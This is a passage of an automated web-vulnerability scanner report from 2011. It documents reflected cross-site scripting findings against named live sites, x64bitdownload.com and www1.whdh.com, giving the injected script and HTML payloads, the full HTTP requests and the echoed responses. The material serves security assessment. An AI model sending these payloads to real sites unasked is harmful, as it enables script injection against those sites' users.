The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1427b"><script>alert(1)</script>c7b5b0e2601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit-pad-file.html?1427b"><script>alert(1)</script>c7b5b0e2601=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/submit-pad-file.html?1427b"><script>alert(1)</script>c7b5b0e2601=1" />
...[SNIP]...

4.1849. http://www.x64bitdownload.com/tellafriend.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /tellafriend.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1567d"><script>alert(1)</script>357966335fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tellafriend.html1567d"><script>alert(1)</script>357966335fd HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:24:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/tellafriend.html1567d"><script>alert(1)</script>357966335fd" />
...[SNIP]...

4.1850. http://www.x64bitdownload.com/tellafriend.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /tellafriend.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5d8"><script>alert(1)</script>439cf2505d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tellafriend.html?bb5d8"><script>alert(1)</script>439cf2505d6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/tellafriend.html?bb5d8"><script>alert(1)</script>439cf2505d6=1" />
...[SNIP]...

4.1851. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6ec"><script>alert(1)</script>d3d7a4e3e9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templatesbe6ec"><script>alert(1)</script>d3d7a4e3e9d/X64/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templatesbe6ec"><script>alert(1)</script>d3d7a4e3e9d/X64/css/rating.css" />
...[SNIP]...

4.1852. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a3c"><script>alert(1)</script>8a1532546b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X6410a3c"><script>alert(1)</script>8a1532546b6/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X6410a3c"><script>alert(1)</script>8a1532546b6/css/rating.css" />
...[SNIP]...

4.1853. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa220"><script>alert(1)</script>18ce10ab220 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/cssfa220"><script>alert(1)</script>18ce10ab220/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/cssfa220"><script>alert(1)</script>18ce10ab220/rating.css" />
...[SNIP]...

4.1854. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acf7e"><script>alert(1)</script>3af3c139581 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/css/rating.cssacf7e"><script>alert(1)</script>3af3c139581 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/css/rating.cssacf7e"><script>alert(1)</script>3af3c139581" />
...[SNIP]...

4.1855. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddb4"><script>alert(1)</script>3c49f3529e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates6ddb4"><script>alert(1)</script>3c49f3529e7/X64/css/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates6ddb4"><script>alert(1)</script>3c49f3529e7/X64/css/x64_main.css" />
...[SNIP]...

4.1856. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4258f"><script>alert(1)</script>7057cfe06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X644258f"><script>alert(1)</script>7057cfe06f/css/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X644258f"><script>alert(1)</script>7057cfe06f/css/x64_main.css" />
...[SNIP]...

4.1857. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea3de"><script>alert(1)</script>3f9e9d602b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/cssea3de"><script>alert(1)</script>3f9e9d602b4/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/cssea3de"><script>alert(1)</script>3f9e9d602b4/x64_main.css" />
...[SNIP]...

4.1858. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e77f"><script>alert(1)</script>b3861bca820 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/css/x64_main.css2e77f"><script>alert(1)</script>b3861bca820 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/css/x64_main.css2e77f"><script>alert(1)</script>b3861bca820" />
...[SNIP]...

4.1859. http://www.x64bitdownload.com/top-software-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /top-software-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 452a6"><script>alert(1)</script>aad361d3eee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-software-downloads.html452a6"><script>alert(1)</script>aad361d3eee HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/top-software-downloads.html452a6"><script>alert(1)</script>aad361d3eee" />
...[SNIP]...

4.1860. http://www.x64bitdownload.com/top-software-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /top-software-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c04"><script>alert(1)</script>82fac2b2da7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-software-downloads.html?81c04"><script>alert(1)</script>82fac2b2da7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/top-software-downloads.html?81c04"><script>alert(1)</script>82fac2b2da7=1" />
...[SNIP]...

4.1861. http://www1.whdh.com/features/articles/dish/BO144734/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144734/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b6a"><a>6635c8f9e01 was submitted in the REST URL parameter 4. This input was echoed as b9b6a\"><a>6635c8f9e01 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144734b9b6a"><a>6635c8f9e01/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:15 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close
Content-Length: 11914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144734b9b6a\"><a>6635c8f9e01/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1862. http://www1.whdh.com/features/articles/dish/BO144759/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144759/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5ac4"><a>b14a891ae7 was submitted in the REST URL parameter 4. This input was echoed as d5ac4\"><a>b14a891ae7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144759d5ac4"><a>b14a891ae7/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:47 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:07 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144759d5ac4\"><a>b14a891ae7/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1863. http://www1.whdh.com/features/articles/dish/BO144797/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144797/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab001"><a>7bdcb52ea9d was submitted in the REST URL parameter 4. This input was echoed as ab001\"><a>7bdcb52ea9d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144797ab001"><a>7bdcb52ea9d/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:08 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 11914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144797ab001\"><a>7bdcb52ea9d/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1864. http://www1.whdh.com/features/articles/dish/BO144833/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144833/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d8"><a>2ca3bfe2d55 was submitted in the REST URL parameter 4. This input was echoed as 605d8\"><a>2ca3bfe2d55 in the application's response.

